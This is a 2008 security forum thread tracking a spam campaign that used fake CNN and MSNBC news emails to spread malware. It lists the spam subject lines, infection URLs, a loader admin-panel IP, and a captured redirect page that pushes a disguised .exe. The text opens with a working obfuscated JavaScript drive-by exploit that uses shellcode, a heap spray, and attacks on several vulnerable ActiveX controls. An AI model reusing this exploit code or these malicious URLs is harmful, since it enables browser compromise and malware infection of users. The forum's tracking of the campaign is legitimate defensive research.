unescape("WxkNmvuUQyhwYNlu4343WxkNmvuUQyhwYNlu4343WxkNmvuUQyhwYNlu0febWxkNmvuUQyhwYNlu335bWxkNmvuUQyhwYNlu66c9WxkNmvuUQyhwYNlu80b9WxkNmvuUQyhwYNlu8001WxkNmvuUQyhwYNluef33WxkNmvuUQyhwYNlue243WxkNmvuUQyhwYNluebfaWxkNmvuUQyhwYNlue805WxkNmvuUQyhwYNluffecWxkNmvuUQyhwYNluffffWxkNmvuUQyhwYNlu8b7fWxkNmvuUQyhwYNludf4eWxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNlu64efWxkNmvuUQyhwYNlue3afWxkNmvuUQyhwYNlu9f64WxkNmvuUQyhwYNlu42f3WxkNmvuUQyhwYNlu9f64WxkNmvuUQyhwYNlu6ee7WxkNmvuUQyhwYNluef03WxkNmvuUQyhwYNluefebWxkNmvuUQyhwYNlu64efWxkNmvuUQyhwYNlub903WxkNmvuUQyhwYNlu6187WxkNmvuUQyhwYNlue1a1WxkNmvuUQyhwYNlu0703WxkNmvuUQyhwYNluef11WxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNluaa66WxkNmvuUQyhwYNlub9ebWxkNmvuUQyhwYNlu7787WxkNmvuUQyhwYNlu6511WxkNmvuUQyhwYNlu07e1WxkNmvuUQyhwYNluef1fWxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNluaa66WxkNmvuUQyhwYNlub9e7WxkNmvuUQyhwYNluca87WxkNmvuUQyhwYNlu105fWxkNmvuUQyhwYNlu072dWxkNmvuUQyhwYNluef0dWxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNluaa66WxkNmvuUQyhwYNlub9e3WxkNmvuUQyhwYNlu0087WxkNmvuUQyhwYNlu0f21WxkNmvuUQyhwYNlu078fWxkNmvuUQyhwYNluef3bWxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNluaa66WxkNmvuUQyhwYNlub9ffWxkNmvuUQyhwYNlu2e87WxkNmvuUQyhwYNlu0a96WxkNmvuUQyhwYNlu0757WxkNmvuUQyhwYNluef29WxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNluaa66WxkNmvuUQyhwYNluaffbWxkNmvuUQyhwYNlud76fWxkNmvuUQyhwYNlu9a2cWxkNmvuUQyhwYNlu6615WxkNmvuUQyhwYNluf7aaWxkNmvuUQyhwYNlue806WxkNmvuUQyhwYNluefeeWxkNmvuUQyhwYNlub1efWxkNmvuUQyhwYNlu9a66WxkNmvuUQyhwYNlu64cbWxkNmvuUQyhwYNluebaaWxkNmvuUQyhwYNluee85WxkNmvuUQyhwYNlu64b6WxkNmvuUQyhwYNluf7baWxkNmvuUQyhwYNlu07b9WxkNmvuUQyhwYNluef64WxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNlu87bfWxkNmvuUQyhwYNluf5d9WxkNmvuUQyhwYNlu9fc0WxkNmvuUQyhwYNlu7807WxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNlu66efWxkNmvuUQyhwYNluf3aaWxkNmvuUQyhwYNlu2a64WxkNmvuUQyhwYNlu2f6cWxkNmvuUQyhwYNlu66bfWxkNmvuUQyhwYNlucfaaWxkNmvuUQyhwYNlu1087WxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNlubfefWxkNmvuUQyhwYNluaa64WxkNmvuUQyhwYNlu85fbWxkNmvuUQyhwYNlub6edWxkNmvuUQyhwYNluba64WxkNmvuUQyhwYNlu07f7WxkNmvuUQyhwYNluef8eWxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNluaaecWxkNmvuUQyhwYNlu28cfWxkNmvuUQyhwYNlub3efWxkNmvuUQyhwYNluc191WxkNmvuUQyhwYNlu288aWxkNmvuUQyhwYNluebafWxkNmvuUQyhwYNlu8a97WxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNlu9a10WxkNmvuUQyhwYNlu64cfWxkNmvuUQyhwYNlue3aaWxkNmvuUQyhwYNluee85WxkNmvuUQyhwYNlu64b6WxkNmvuUQyhwYNluf7baWxkNmvuUQyhwYNluaf07WxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNlu85efWxkNmvuUQyhwYNlub7e8WxkNmvuUQyhwYNluaaecWxkNmvuUQyhwYNludccbWxkNmvuUQyhwYNlubc34WxkNmvuUQyhwYNlu10bcWxkNmvuUQyhwYNlucf9aWxkNmvuUQyhwYNlubcbfWxkNmvuUQyhwYNluaa64WxkNmvuUQyhwYNlu85f3WxkNmvuUQyhwYNlub6eaWxkNmvuUQyhwYNluba64WxkNmvuUQyhwYNlu07f7WxkNmvuUQyhwYNluefccWxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNluef85WxkNmvuUQyhwYNlu9a10WxkNmvuUQyhwYNlu64cfWxkNmvuUQyhwYNlue7aaWxkNmvuUQyhwYNlued85WxkNmvuUQyhwYNlu64b6WxkNmvuUQyhwYNluf7baWxkNmvuUQyhwYNluff07WxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNlu85efWxkNmvuUQyhwYNlu6410WxkNmvuUQyhwYNluffaaWxkNmvuUQyhwYNluee85WxkNmvuUQyhwYNlu64b6WxkNmvuUQyhwYNluf7baWxkNmvuUQyhwYNluef07WxkNmvuUQyhwYNluefefWxkNmvuUQyhwYNluaeefWxkNmvuUQyhwYNlubdb4WxkNmvuUQyhwYNlu0eecWxkNmvuUQyhwYNlu0eecWxkNmvuUQyhwYNlu0eecWxkNmvuUQyhwYNlu0eecWxkNmvuUQyhwYNlu036cWxkNmvuUQyhwYNlub5ebWxkNmvuUQyhwYNlu64bcWxkNmvuUQyhwYNlu0d35WxkNmvuUQyhwYNlubd18WxkNmvuUQyhwYNlu0f10WxkNmvuUQyhwYNlu64baWxkNmvuUQyhwYNlu6403WxkNmvuUQyhwYNlue792WxkNmvuUQyhwYNlub264WxkNmvuUQyhwYNlub9e3WxkNmvuUQyhwYNlu9c64WxkNmvuUQyhwYNlu64d3WxkNmvuUQyhwYNluf19bWxkNmvuUQyhwYNluec97WxkNmvuUQyhwYNlub91cWxkNmvuUQyhwYNlu9964WxkNmvuUQyhwYNlueccfWxkNmvuUQyhwYNludc1cWxkNmvuUQyhwYNlua626WxkNmvuUQyhwYNlu42aeWxkNmvuUQyhwYNlu2cecWxkNmvuUQyhwYNludcb9WxkNmvuUQyhwYNlue019WxkNmvuUQyhwYNluff51WxkNmvuUQyhwYNlu1dd5WxkNmvuUQyhwYNlue79bWxkNmvuUQyhwYNlu212eWxkNmvuUQyhwYNluece2WxkNmvuUQyhwYNluaf1dWxkNmvuUQyhwYNlu1e04WxkNmvuUQyhwYNlu11d4WxkNmvuUQyhwYNlu9ab1WxkNmvuUQyhwYNlub50aWxkNmvuUQyhwYNlu0464WxkNmvuUQyhwYNlub564WxkNmvuUQyhwYNlueccbWxkNmvuUQyhwYNlu8932WxkNmvuUQyhwYNlue364WxkNmvuUQyhwYNlu64a4WxkNmvuUQyhwYNluf3b5WxkNmvuUQyhwYNlu32ecWxkNmvuUQyhwYNlueb64WxkNmvuUQyhwYNluec64WxkNmvuUQyhwYNlub12aWxkNmvuUQyhwYNlu2db2WxkNmvuUQyhwYNluefe7WxkNmvuUQyhwYNlu1b07WxkNmvuUQyhwYNlu1011WxkNmvuUQyhwYNluba10WxkNmvuUQyhwYNlua3bdWxkNmvuUQyhwYNlua0a2WxkNmvuUQyhwYNluefa1".replace(/WxkNmvuUQyhwYNl/ig, "%") + outValue);var hadttdtSize = 0x400000;var payfdLytyusade = Shellcode.length * 2;var tggter = payfdLytyusade + 0x38;var saruuysaddize = hadttdtSize - tggter;var spraySlide = unescape("QJoHkPQGkyiu0c0cQJoHkPQGkyiu0c0c".replace(/QJoHkPQGkyi/ig, "%")); var prrerat = new Array();spraySlide = Gslide(spraySlide, saruuysaddize);var kilrrer = nggByhS - 0x400000;hsttiicks = kilrrer / hadttdtSize; for (i = 0; i < hsttiicks; i++){prrerat[i] = spraySlide + Shellcode;}function startCreateControlRange(){ugric = unescape("QKSVrYqLThkUyju0d0dQKSVrYqLThkUyju0d0d".replace(/QKSVrYqLThkUyj/ig, "%"));var xYz = 0x40000;while(ugric.length<xYz) ugric += ugric;ugric = ugric.substring(0, 0x3ffe4-Shellcode.length);bublic = new Array();for(i = bublic; i < 450; i++) bublic[i] = ugric + Shellcode; mceil = Math.ceil(0xd0d0d0d);document.write('<object classid="CLSID:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F"></object>');try{mceil = document.scripts[0].createControlRange().length;}catch(e){}setTimeout("startSuperBuddy()", 3000);}function startSuperBuddy(){try {var buddy = new ActiveXObject('Sb*%.S)*upe^r*!B^udd*y*&.1'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));if (buddy){buddy.LinkSBIcons(0x0c0c0c0c);}}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement('o@bje*ct%^'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));mmed.setAttribute('cl!a%s&s#i!)d&'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'clsi!d!@:*7%7#82!9(F&14-(D)*9)11!-40@FF&*-A)2#^F0-D11D$$B#8(!D@6%#D0*B^(C@'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var mms='';for(var i=0; i < 4120; i++) { mms += 'A('.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''); }mms += ' &) @! *!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');mmed.SetFormatLikeSample(mms);}catch(e){}setTimeout("startGOM()", 2000);} function startGOM(){var sURL='';for(var i = 0; i < 510; i++){sURL += unescape("nSzRvYVJyyJu0c".replace(/nSzRvYVJyyJu/ig, "%"));}try{var GomManager = new ActiveXObject('G%#o^m^#W^eb#C#t&r!l!.G#^om)&Man&a*g&er^.1&'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));GomManager.OpenURL(sURL);}catch(e){}setTimeout("startRealPlayer()", 2000);}function startRealPlayer(){try{var rpl = document.createElement('o^&b%)j%e!ct'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')),adt='';rpl.setAttribute('cla&%s#s$%id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'c@ls@id:#2$)F*#5@^42@A*!2E%-%E^D$)C(9)-4^*B!F(7^-8^C)B1-%8#7^C*9$91))9&F7$F@9)!3$&'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(var i = 0; i < 32; i++) { adt=adt+unescape("iNIwLMtmTIIsTzT0C".replace(/iNIwLMtmTIIsTzT/ig, "%")); }for(i = 0; i < 5; i++){rbt = rpl.Console;rpl.Console = adt;rpl.Console = rbt;}setTimeout("startWVF()", 2000);}catch(e){}}function startWVF(){for (i = 0; i < 128; i++) {try{var tar = new ActiveXObject('We)bVie#wF(o$l!$de%(r(I*co^#n%.We@bView)!Fol*d*&e!r^(I$co*n%.&1^&'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505);}catch(e){}}} startCreateControlRange();</script>
Title: Re: R-thing
Post by: JohnC on August 02, 2008, 09:18:28 pm
Good work, thanks.

Will you be deleting older emails? So that it is easier to parse through newer files you upload.
Title: Re: R-thing
Post by: MysteryFCM on August 03, 2008, 10:48:54 am
I'll sort out the newer from the older for the next file :)
Title: Re: R-thing
Post by: MysteryFCM on August 03, 2008, 02:30:04 pm
01-08 > 03-08
Title: Re: R-thing
Post by: JohnC on August 03, 2008, 02:39:25 pm
Thank you.

Some of the Email titles these use (Thanks to MysteryFCM, from his text files)

Quote
"Last lecture" professor dies
'Demons' befall celebrated Iraq soldier
10 things women want
14 missing girls found in basement of Iowa house
14 year old plotted mass slaughter
3 US Marines killed in freak training accident
AC Milan buys Drogba and Adebayor
ATI and NVIDIA fix prices in the US
Acid rain coming due to pollution
Afghan rebels kill 102 US soldiers
Air force one crashes in Iraq
Al-Qaeda Gets Nuke, Blows Themselves Up
Alligator attack savages 3 students on school trip
American hostages beheaded in Colombia
American love story in Iraq
Amy Winehouse hospitalized following drug overdose
Angelina Jolie dies in miscarriage
Angelina Jolie gives birth to triplets
Angelina Jolie seen with Justin Timberlake on Monaco yacht
Angry man shoots lawnmower
Apple nosedives on Jobs' death
Apple unveils Macbook Air upgrade
Armed man kills hundreds in church
Army Relent On Shooting Live Pigs In Training Exercise - Will Shoot Illegal Immigrants Instead
Arnold Schwarzenegger to make movie
Artist to honourr Wii heroes witth statuettes
Artist, 112, gaining attention in art world
Awesome footage of 10 best positions
B-52 bomber crashes off island of Guam
Baby born with seven toes
Baby cut from mother's womb
Barack Obama Caught In A Time Warp
Barack Obama pulls out from Presidential Race
Bearded Lady Gives Birth
Beckham caught in nightcam
Beijing postpones Olympics due to McCain-Dalai Lama meeting
Beijing under threat as Olympics looms
Berbatov sold for 30 million pounds
Best jokes about your boss
Best prediction for upcoming lottery
Bird flu found in New Mexico
Black dogs tear man apart
Body of a tranny revealed
Bomb scare in JFK causes delays
Bomb scare in UK stops traffic
Boob grabber caught on cctv
Boobies that boggles your mind
Booy mad at mom takes litttle brother on joy ride
Boss says you will be fired
Boy 13, impaled by fence
Boy breaks tooth from biting dog
Boy crossing street collides with deer Video T-shirt
Boy left in car dies on mom's wedding day Video
Boy pokes fork into sister's eye
Boy thrown outside window in school
Brazilian Woman Survivees 6 Shots to Headd
Bridge collapses in New York
British Speedeer Clocked at 172  Mph
Britney Spears announces third pregnancy
Britney Spears new album download
Britney Spears quits singing career
Britney in coma, feared dead
Britney loses kids
Britney pays $20000 for custody
Britney's baby in intensive care
Bulgarian diplomat arrested with 0.4kg of plutonium
Bulimia Not The Same As Being A Greedy Bastard, Say Doctors
Bullies face huge health risk
Bus explosion
Bush And Putin Agree To Restart Cold War During G8 Summit
Bush admits to anti-semitism
Bush approves death penalty for soldier
Bush discredits Tony Snow in eulogy
Bush refuses appeal against death penalty for soldier
Buy a house, get a FREE car
Cats attack, kill student
Cats skinned alive in Alabama
Celeb homemade videos leaked
Celebrity caught in hit and run
Celebrity rendezvous videos revealed
Cell phone radiation risks exposed
Charred bodies found near White House
Cheap fuel available in Texas
Chelsea happy to rid Drogba
Christian Bale arrested for drug abuse
Christian Bale in sexual assault suit
Christian leader mulls McCain reversal
Christine Bale skips bail
Clinton in, Obama out
Clinton named to top post by Obama
Clubs refuse to release players for Olympics
Coke Rolling Out Machines Thaat Take Credit CCards
College gang rips out teacherís organs
Conspiracy of 1865 Lincoln assassination exposed
Coolest hotel room in Dubai
Corruption in US Senate beyond control
Courts found to help terrorists
Crazily in love with you
Cristiano Ronaldo Disses Paris Hilton "um Louro Mudo Feio!"
Cute video of ducks
Cynthia Rodriquez divorces
Danish princess slaps town grocer
Dara Torres faces crippling injury
Dark Knight breaks box office bank
Dark Knight brought in $300 million
Dark Knight free tickets up for grabs
Dark Knight movie out on DVD
Dark Knight nemesis finally dead
Dark Knight opening premier sneak previews
David Beckham seen in LA nightclub with Kirsten Dunst
Deaf Woomaan Arrested After Crashing Into Two Homes
Democrats withdraw Obama from Race
Dogs and cats. Advise area
Dolly eyes Yucatan; Cristobal skirts N.C.
Drug Bust on Snoop's Tour Bus
Drug, alcohol mix blamed for "Joker's" death
Earthquake in California destroys Schwarzenegger house
Eminem found dead in disco toilet
Escape artist gets caught shopping
Ex-Google engineers debut 'Cuil' way to search
Ex-NFL star caught in gay scandal
Exported by: Outlook Export v0.1.2
Exposed secrets of American Idol
Extraterrestrials found in Arizona
FDA warns against eating lobster
Facebook hacked into, millions of accounts lost
Facebook sued by user for millions
Fast cars and hot women
Ferrari cheapens brand by making affordable car
Financial turmoil heats up
Find out womens weakness spots and satisfy them
Florida Bill Would Ensure Bar Customerss Aren't Thrown Out Foor Not Drinking
Flu outbreak kills thousands in Mexico
Football star dies of drug overdose
For The Man Who Has Everything: Three Tits
Foreplay and karma sutra tips
Former 'Naked Guy' attt UC-Berkeley dies in jail
Frasier to make big screen leap
Freak accident causes Tom cruise to be paralysed
Freddie Mac collapses, all loans withdrawn
Free direct downloads available here
Free downloads for all software needs
Free trip to Bahamas for subscribers
Fresh fighting causes civil war
Friends-movie to be released in Summer 09
Funniest adult entertainment
G8 leaders face nuclear crisis
GE declares 100 million deficit
Gardeners sued for toxic fertiliser
Gay Bishop Was A Wrestling Pro
Gay Marriage Could Be Profitable
Gay Men Perceive Each Other As Homophobic
Gays Banned From Owning Pets In New York
Gays and lesbians boycott
Geek turns into hot babe
Girl bites brother's finger off
Google-Yahoo merger announced
Grab these girl fight videos
Group: Bound Palestinian shot with rubber bullet
Guam crash kills 3 more marines
Gunman kills 7 in shooting
Guy Ritchie declares marriage "over"
Guy peddles girlfriend for hundred bucks
HHarold Reynolds's  Big Hit
Hack iPhone 3G for any service provider
Hang out with bikini models
Heart transplant kid kills 10, shots himself
Heat wave in Texas kills 24
Heath Ledger awarded posthumous oscar
Heath Ledger beat Christian Bale in popularity
Hell Boy wants to paradise
Hell is a more preferable destination than Heaven
Hidden shop for mans
High paying dividend stocks
High school teacher rapes cheerleader
Hillary Clinton admits affair
Home grown vegetables contaminated with toxic fertiliser
Horrible borken leg
Horse bites man's neck in zoo
Horse gets swallowed by snake
Horse kicks Harrison Ford in stomach
Horse kicks Ralph Lauren in stomach
How to beat the bookmakers
Hunderds feared dead in ferry crash
Hurricane Katrina headed to Northwest
Hurricane hits Caribbean islands
Hurricane strikes Lousiana, thousands dead
IBM launches mphone to compete against iphone
IBM launches world's thinnest notebook
IBM to file for bankruptcy
India's dangerous deal
Inside San Quentin, convicts hitting the books
JFK closed after bomb threat
JFK memoirs reveal illegitimate son
James Brown dies of heart attack
Japan quake death toll reaches 10, 000
Japanese pitcher throws perfect game
Jay Leno refuses to quit
Jerry Seinfeld announces Seinfeld movie
Jessica Simpson becomes pornstar
Jobs up for grabs in upcoming fest
Join European Idol auditions now
Join thousands of others in this
Joker steals the show
Kelsey Grammer in hospital after heart attack
Kidnapper at large in NY, dangerous
Kids rob elderly, police open fire
LaBeouf behind bars after DUI-incurring car crash
Latest crazy hip in thing
Learn how to kiss your partner
Lebron James traded to the Knicks
Living proof that the earth is flat available
Local family found hidden gold
Local waiter caught spitting in food
Lucky draw for free cruise trip
Lufthansa suspends flight in Germany due to strikes
MLB players boycott All-Star game
Mad woman screams at man
Madonna admits to adultery
Maid of Eva Longoria claims abuse by star
Make easy money faster
Make money without having to work
Man bombs casino after losing poker
Man kills churchgoers
Man makes dog eat human
Mariah Carey is many menís sex goddess
Massive earthquake in Japan kills thousands
McCain accuses media of bias towards Obama
McCain diagnosed with skin cancer, surgery done
McCain drops out of running
McCain leads in popularity polls
McDonald's Happy Meals In San Francisco To Include Gay Marriage License
Medicare bill promises free health care
Mermaid discovered off NZ coast
Merrill Lynch files for bankruptcy
Merrill Lynch to be shut down
Michael Jackson dies in bed
Michael Jordan caught with fraud
Mick Jagger reveals Angelina Jolie affair
Microsoft launches new social interaction site
Microsoft takes over Yahoo Inc
Microsoft unveils new windows platform
Miley Cyrus hidden pics
Miley Cyrus videos exposed
Miss America slept with judge
Miss USA falls in Miss Universe
Monkey breast feeds human baby
Monkey shoots trainer with tranquilizer
More tapes of Scarlett Johansson surface
Most viewed video on Youtube
Much awaited Friends-movie to be released
Mysterious assailant stabs Luke Perry
NASA to use Space Shuttles to Kill Birds
NASDAQ plunges 15% overnight
NY Times offices set ablaze by arsonists
Nadal and Federer parties with models
Nadal disqualified from Wimbledon win
Neighbor's envy, owner's pride
Nereida gets red card from Cristiano Ronaldo
New Ford models sneak previews
New Star Wars movie to be released
New Xbox 360 Premium at great prices
New heat wave detected
New nip slip pics of Britney
New recipe for successful love
New york fashion show promises new looks
Newsroom cuts curb content, study shows 49 min
Nicole Kidman baby in hospital
Nicole Kidman gives birth to baby girl
Nicole Kidman loses baby in miscarriage
Ninja attack in New York Times Square
No human part is stronger longer
North korea nuclear fallout
Norton Firm admits to releasing viruses
Now you can get it before anyone.
Obama Is Anorexic Over-Exerciser;
Obama admits extra-marital affair
Obama hurt in car crash
Obama spotted in secret China meeting
Obama's family became victim of terrorist threats
Obama's karma over slip of tongue
Oil falls below $100 a barrel
Oil prices fall sharply
Oil prices finally dip after sharp increase
Oil prices to reach $200 year-end
Old man grabs young boobies
Online delivery notification for your shipment
Oprah Winfrey announces marriage
Oprah Winfrey hurt in car crash
Oprah breaks leg in riding accident
Oprah hurt in freak highway accident
Oprah raises money for Obama fundraiser
Oprah wedding planned for November
Orgy at MTV awards
Outcry over Democrat voting irregularities
Pa. Deputy Sheriff Accuused of Lewdnness
Pamela Anderson Shouts, "i'm Gonna Remarry My One And Only True Love Tommy!"
Pamela Anderson in new scandal
Paris Hilton Is Going To Jail
Paris Hilton stabbed by stalker
Paris does it again
Paris wardrobe malfunction
Patrick Swayze suicide after cancer news
Paupers turn millionaires
People's magazine hottest couple
Plot discovered to keep oil prices high
Poker winner dies of heart attack
Police investigation fingers De Niro in mafia funding scandal
Pollution reaches dangerous levels in California
Pope killed by assasin in Vatican City
Powerful quake kills thousands in Japan
Prada gives fake bags to charity
Pregnancy bleed forces Jolie to abort
President Bush approves execution of soldier
President Bush calls for Olympic boycott
President Bush's iPod: The Complete Playlist
Previews of the hottest new flick
Priest and nun humping in confession room
Private investigation report on your wife
Private plane travel to be banned
Pyrenean dog sled race canncelled for lacck of snow
Qantas CEO to quit following crash
Queen Elizabeth abducted in Tibet
Quotes of the day: Cameron Sinclair
Rare shark stolen from Dream world
Rat meat found in fast food
Rat meat found in spaghettis
Rat poison found in bottled waters
Restaurants caught recycling food
Robot Chickeen GTA Spooof
Ronald Reagan Prime Suspect In Bank Robbery
Ronaldo admits to being bi sexual
Ronaldo crippled after surgery
Ronaldo rapes underaged girl
Ronaldo says no to Nereida
Rowling announces next Harry Potter book
SI: Dolphins trade 6-time Pro Bowler to 'Skins
Sarah Jessica Parker Arrested For Gross Negligee
Saturated fat found to be good for you
Saved from e-mails found in folder: Nuwar
Secret oil reserves in Texas
Secrets of hymen restoration
See this fastest beer drinker
Seinfeld to return for one last season
Self test IQ questions
Sensational football finale
Service lets drivers  lock in gasoline pprices
Shark attack off Australia, 2 dead
She is fated to love you
Shia LAbeouf still in police custody
Shocking Video Shows Spongebob And Gay Sex!
Signs she is interested
Simpson turns into pornstar
Snake caught with cow in stomach - pictures
So you think you can dance
Soldier ordered to be excecuted by president
Spider man helps James Bond!
Steamiest scene in flim awards
Stray javelin kills promising US sprinter
Stupid man gets dildo stuck in anal
Stuudy: California Beaches  Sicken 1.5 Million
Subjects:
Subprime crisis claims thousands of homes
Suicide blasts in Iraq kill hundreds
Suicide bomber changes mind last minute
Super earthquake detected
Talks break down, world war unavoidable
Teenage Girl obviously Having Affair With Bat
Tell them about the honey
Terrorist threat sidelines Beijing Olympics
The AMERO currency replacing the Dollar
The Dark Knight survives haunting
The best stock tips today
The greatest love story ever told
The loves of mini-me
The only thing men want
The top-grade merchandise and service
The truth about gas prices
The truth about ghosts revealed
The truth about virginity
Three children jailed for armed holdup
Ticker: Giuliani says Obama shows inexperience
Tips on getting laid
Too much salt linked to breast cancer
Tornado in New York destroys city
UFO sighting in downtown NY
UK Prime Minister forced to quit
US Marines beheaded in Iraq
US Senator found guilty of treason
US data sets stocks surging
US economy plunges into official depression
US embassy in Britain bombed
US government war brothels
US moves to reject citizenship to muslims
Uighur group bombs China bus
Unmarried Couple Deniedd Riight to Move In
Victoria Beckham drunk again
Virgin Galactic shows off mothership space craft
WHIO: Airliner emergency halts air show
Waiter caught spitting in customer food
Waiters caught putting dirt in food
Want to make money while surfing
Ways to make her go wild
Wedding Biels for Just & Jess
Western 'butlers' cater to Tokyo women Video T-shirt
What else you can do inside your car?
When boobs get this big
White House terrorist plans foiled
Why girlfriends and wives cheat you
Wii Fit sets used to train US troops
Wildfires plague Texas, hundreds homeless
Win a free trip to Vegas
Woman charged with homicide in baby mystery
Woman found with bottle in vagina
Woman loses foot in shock attack
Woman loses nose after dog attack
Woman says cat saved her from fire
Woman, Cops  Exchange Pepper Spray Blastts
World record love making
World's oldest joke in Egypt
X-rays cause cancer - new medical research
Yahoo search shuts down for good
You are about to get fired
You are in grave danger
You are in mafia blacklist
You boss just gave you testimonial
You have answered the right questions Please collect your prize
You should check out this funny video
YouTube shut down after complaints
YouTube shut down by lawsuit
YouTube sued again by Italian company
Your advice is needed here
Your friend is jealous of you
[audio] Church Group Offers Homosexual New Life In Closet
[video] If Barack Obama Is An Oreo, What Is John Mclaughlin
eBay sued for copyright infringement
iPhone 3G bugs causes recall of stock
iPhone 3G free exchange or upgrade
iPhone 3G prices slashed
iPhone 4G sneak peaks
iPhone ver 2.0 sneak peeks
iPhones going for free
nazi Toddlers Ruined My Birthday
Title: Re: R-thing
Post by: MysteryFCM on August 05, 2008, 12:10:32 am
03 > 05

/edit

Apologies, ignore the following (shoved them in the wrong folder);

Code: [Select]
http://www.likeamaze.com/
http://www.amazequick.com/
http://www.strapquick.com/

Additionally, the e-mails containing the *.cnn.com/net (which can also be ignored), linked to;

autourdufeu.net/index2.html

... which is the actual infection .......
Title: Re: R-thing
Post by: MysteryFCM on August 05, 2008, 12:16:05 am
Just had two more of the CNN e-mails, linking to;

wellnessantamaria.com/index2.html
realdecor.com.br/index2.html

Subject for both of them;

CNN.com Daily Top 10

/edit

... and another;

weddingsinsardinia.com/index2.html
Title: Re: R-thing
Post by: MysteryFCM on August 05, 2008, 03:04:03 am
Another of the CNN ones;

3dtoy.com.br/index2.html
Title: Re: R-thing
Post by: Kayrac on August 06, 2008, 11:44:55 am
from a member at dslreports

Code: [Select]
www.bellomeparrucchieri.it/cnnnews.html
Title: Re: R-thing
Post by: Serg on August 06, 2008, 12:17:58 pm
from a member at dslreports

Code: [Select]
www.bellomeparrucchieri.it/cnnnews.html

admin page is here
Code: [Select]
http://66.199.231.178/ldrctl/ldrctl.php
Title: Re: R-thing
Post by: MysteryFCM on August 07, 2008, 05:19:25 pm
New list .....
Title: Re: R-thing
Post by: JohnC on August 07, 2008, 08:11:42 pm
Thanks.
Title: Re: R-thing
Post by: MysteryFCM on August 08, 2008, 12:26:40 am
Seem to have changed again;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.3 Results
Source code for: http://cfgm.es/index1.php
Server IP: 87.106.192.162 [ clienteservidor.es ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 08 August 2008
Time: 01:25:12:25
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://cfgm.es/videoporn21782.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="http://cfgm.es/pindex.php" style="width:1px; height:1px;"></iframe><br>

<div style="text-align:center; padding-top:50px;">
<a href="http://cfgm.es/videoporn21782.exe" style="font-weight:bold;"><img src="wait.gif" style="border:0px;"></a><br>
<br>
<a href="http://cfgm.es/videoporn21782.exe" style="font-weight:bold; color:#364980; font-size:17px;">Download Video</a>

</div>
</body>
</html>
Title: Re: R-thing
Post by: JohnC on August 11, 2008, 09:08:25 am
Thanks.
Title: Re: R-thing
Post by: MysteryFCM on August 11, 2008, 01:30:45 pm
09 > 11
Title: Re: R-thing
Post by: philipp on August 12, 2008, 10:58:02 am
Code: [Select]
http://auto-inzerce.cz/index1.php
Code: [Select]
http://www.uwg-groebenzell.de/cnnnews.html
http://www.marmibuono.com/cnnnews.html
Code: [Select]
http://nomerodin.net/cnncurrent.html
http://oniko-m.ru/cnncurrent.html
http://misoares.com/cnncurrent.html
http://elpatiodejesusmaria.com/cnncurrent.html
http://mayskles.ru/cnncurrent.html
http://lunchboxcafe.ru/cnncurrent.html
Code: [Select]
http://infogranja.com.ar/update.html

edit: updated
Title: Re: R-thing
Post by: MysteryFCM on August 12, 2008, 10:25:28 pm
11 > 12
Title: Re: R-thing
Post by: MysteryFCM on August 13, 2008, 11:01:51 am
They've switched to MSNBC ........

Code: [Select]
Exported by: Outlook Export v0.1.2


From: MSNBC Breaking News
E-mail:marneuse1968@2callback.com [ 63.214.247.170 - Resolution failed ]
Date: 13/08/2008 11:35:25
Subject: msnbc.com - BREAKING NEWS: Find out how to get top returns for your money at minimum risk
**************************************************************************
Links
**************************************************************************

Link: http://breakingnews.msnbc.com
Domain: breakingnews.msnbc.com
IP: 207.46.245.33 [ msnbcbusiness.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://70x7riders.org/up.html
Domain: 70x7riders.org
IP: 72.167.131.134 [ p3swh195.shr.phx3.secureserver.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://www.msnbc.msn.com/id/77778358
Domain: www.msnbc.msn.com
IP: 207.46.245.33 [ msnbcbusiness.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://www.msnbc.msn.com/id/22164455
Domain: www.msnbc.msn.com
IP: 207.46.245.33 [ msnbcbusiness.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://privacy.msn.com
Domain: privacy.msn.com
IP: 65.54.135.94 [ privacy.msn.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://privacy.msn.com/
Domain: privacy.msn.com
IP: 65.54.135.94 [ privacy.msn.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
msnbc.com: BREAKING NEWS: Find out how to get top returns for your money at minimum risk

